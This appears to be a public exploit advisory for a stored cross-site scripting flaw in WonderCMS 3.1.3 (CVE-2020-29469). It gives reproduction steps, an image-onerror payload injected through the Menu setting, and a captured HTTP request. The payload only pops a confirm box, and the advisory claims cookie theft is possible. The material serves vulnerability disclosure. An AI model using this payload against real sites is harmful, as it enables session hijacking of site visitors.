# Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting# Date: 20-11-2020# Exploit Author: Hemant Patidar (HemantSolo)# Vendor Homepage: https://www.wondercms.com/# Version: 3.1.3# Tested on: Windows 10/Kali Linux# Contact: https://www.linkedin.com/in/hemantsolo/# CVE: CVE-2020-29469
Attack vector:
This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Menu.
Steps-To-Reproduce:1. Go to the Simple website builder.2. Put this payload in Menu:"hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.
GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1
Host:127.0.0.1
Connection: close
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
DNT:1
User-Agent: Mozilla/5.0(X11; Linux x86_64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:127.0.0.1/demo/hemantsolo-img-src-x-onerror-confirm-1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93
